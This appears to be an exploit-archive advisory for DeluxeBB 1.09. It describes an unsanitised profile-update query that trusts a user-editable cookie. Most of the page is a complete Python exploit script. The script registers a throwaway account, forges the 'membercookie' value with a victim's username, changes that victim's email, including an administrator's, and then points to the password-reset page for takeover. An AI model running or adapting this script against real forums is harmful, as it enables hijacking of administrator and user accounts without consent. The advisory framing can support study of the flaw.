DeluxeBB E-Mail Address Change Security Bypass

2007.12.04
Credit: Nexen
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

http://www.opencosmo.com http://www.opencosmo.com/news.php?readmore=21 ################################################### DeluxeBB E-Mail Address Change Security Bypass Crediti: Nexen Applicazione: DeluxeBB Versione: 1.09 Impatto: Security Bypass Rischio: [3/5] Exploit: #!/usr/bin/python #-*- coding: iso-8859-15 -*- ''' _ __ _____ _____ _ __ | '_ \ / _ \ \/ / _ \ '_ | | | | __/> < __/ | | | |_| |_|\___/_/\_\___|_| |_| ------------------------------------------------------------------------ ------------------------ § DeluxeBB 0day Remote Change Admin's credentials § ------------------------------------------------------------------------ ------------------------ nexen ------------------------------------------------------------------------ ------------------------ PoC / Bug Explanation: When you update your profile, DeluxeBB execute a vulnerable query: $db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')"); So, editing cookie "membercookie" you can change remote user's email. Enjoy ;) ------------------------------------------------------------------------ ------------------------ ''' import httplib, urllib, sys, md5 from random import randint print "\n##################################################################### ###################" print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change " print " " print " Vulnerability Discovered By Nexen " print " Greetz to The:Paradox that Coded the Exploit. " print " " print " Usage: " print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0]) print " " print " Additional Flags: " print " -id34 -passMypassword -port80 " print " " print " Example: " print " python %s 127.0.0.1 admin /DeluxeBB/ me (at) it (dot) com [email concealed] -port81 " % (sys.argv[0]) print " " print "####################################################################### #################\n" if len(sys.argv)<=4: sys.exit() else: print "[.]Exploit Starting." target = sys.argv[1] admin_nick = sys.argv[2] path = sys.argv[3] real_email = sys.argv[4] botpass = "the-new-administrator" rand = randint(1, 99999) dn1 = 0 dn2 = 0 dn3 = 0 try: for line in sys.argv[:]: if line.find('-pass') != -1 and dn1 == 0: upass = line.split('-pass')[1] dn1 = 1 elif line.find('-pass') == -1 and dn1 == 0: upass = "" if line.find('-id') != -1 and dn2 == 0: userid = line.split('-id')[1] dn2 = 1 elif line.find('-id') == -1 and dn2 == 0: userid = "" if line.find('-port') != -1 and dn3 == 0: port = line.split('-port')[1] dn3 = 1 elif line.find('-port') == -1 and dn3 == 0: port = "80" except: sys.exit("[-]Some error in Additional Flag.") if upass=="" and userid != "" or userid == "" and upass != "": print "[-]Bad Additional flags -id -pass given, ignoring them." upass="" userid="" ######################################################################## ####################Trying to connect. try: conn = httplib.HTTPConnection(target,port) conn.request("GET", "") except: sys.exit("[-]Cannot connect. Check Target.") ######################################################################## ####################Registering a new user if id or upass not defined try: conn = httplib.HTTPConnection(target,port) if upass == "" or userid == "": conn.request("POST", path + "misc.php?sub=register", urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': botpass,'pass2': botpass,'email': 'root%d (at) yoursystemgotpowned (dot) it [email concealed]' % (rand) }), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"}) response = conn.getresponse() cookies = response.getheader('set-cookie').split(";") #print "\n\nth331337.%d \n\nthe-new-administrator" % (rand) print "[.]Registering a new user. -->",response.status, response.reason conn.close() ######################################################################## ####################Getting memberid in Cookies for line in cookies[:]: if line.find('memberid') != -1: mid = line.split('memberid=')[1] ######################################################################## ####################Isset like starts try: mid except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass") except AttributeError: sys.exit("[-]AttributeError Check your Target/path.") ######################################################################## ####################Doing some Md5 if upass=="" or userid=="": hash = md5.new() hash.update(botpass) passmd5 = hash.hexdigest() else: hash = md5.new() hash.update(upass) passmd5 = hash.hexdigest() mid = userid ######################################################################## ####################Updating "victim" email in Profile conn = httplib.HTTPConnection(target,port) conn.request("POST", path+"cp.php?sub=settings", urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept": "text/plain","Cookie": "memberid="+mid+"; membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type": "application/x-www-form-urlencoded"}) response = conn.getresponse() print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",response.status, response.reason conn.close() print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n" Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top